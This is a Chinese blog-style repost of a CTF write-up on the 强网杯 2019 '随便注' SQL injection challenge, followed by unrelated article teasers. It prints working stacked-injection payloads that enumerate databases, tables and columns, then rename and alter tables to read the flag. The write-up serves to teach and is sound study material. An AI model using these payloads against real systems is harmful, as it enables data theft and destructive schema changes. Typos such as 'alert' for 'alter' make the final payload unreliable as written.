首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-06-02 16:27:24
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
人力資源規劃的程序和内容
人力資源規劃的程序和内容
關注【本頭條号】更多關于制度、流程、體系、崗位、模闆、方案、工具、案例、故事、圖書、文案、報告、技能、職場等内容,弗布克15年積累免費與您分享!閱讀導航→01人力資源規劃細則02人力資源規劃方案一、人力資源規劃細則人力資源規劃細則第1章總則...
2026-06-02
道家呼吸吐納的正确方法
道家呼吸吐納的正确方法
曉雲/文道家修行方法據說古時候有三千六百門。道家練内丹最重要的就是呼吸吐納法!可是現代人按先師方法練氣總覺得難見成效!甚至容易“走火”岔氣,強身既不可得,更落得一身病痛。現代人都說道家文化沒有與時俱進!很多知識還被淪為旁門左道。的确,道家經...
2026-06-02
孫耀威古裝電視劇片段
孫耀威古裝電視劇片段
#孫耀威#在不少人心目當中,都算是自己童年男神的孫耀威,在某個短視頻平台上曬出了自己最新的自拍視頻。視頻裡面,他又穿上了古裝,特意透露自己目前所在地是橫店。看樣子,他準備開始拍攝一部新劇。面對着這張熟悉的面孔,穿上熟悉的古裝,很多觀衆都回憶...
2026-06-02
流放之路和暗黑破壞神3哪個好玩
流放之路和暗黑破壞神3哪個好玩
比暗黑3更像暗黑2,是很多人對《流放之路》的評價。騰訊今年3.25宣布代理該作,并于今日(5.31)開啟首測,意圖很明顯,就是想要和暴雪剛正面,接盤暗黑類遊戲的用戶。那麼這款更硬核也更有刷的深度的遊戲,是否可以取代制作精良卻更新逐漸乏力的暗...
2026-06-02
基本不等式求值方法
基本不等式求值方法
備戰高考數學,每天都在積蓄力量高中生數學學霸鍛造“1天1道”行動“小檬哥哥”關鍵詞提醒:方程思想,基本不等式,柯西不等式。童鞋們,我又來啦(~o ̄▽ ̄)~o~思路:本解法利用方程思想。小檬哥哥個人覺得這種解法的思維入口點是尋找不等關系,因此...
2026-06-02
Copyright 2023-2026 - www.tftnews.com All Rights Reserved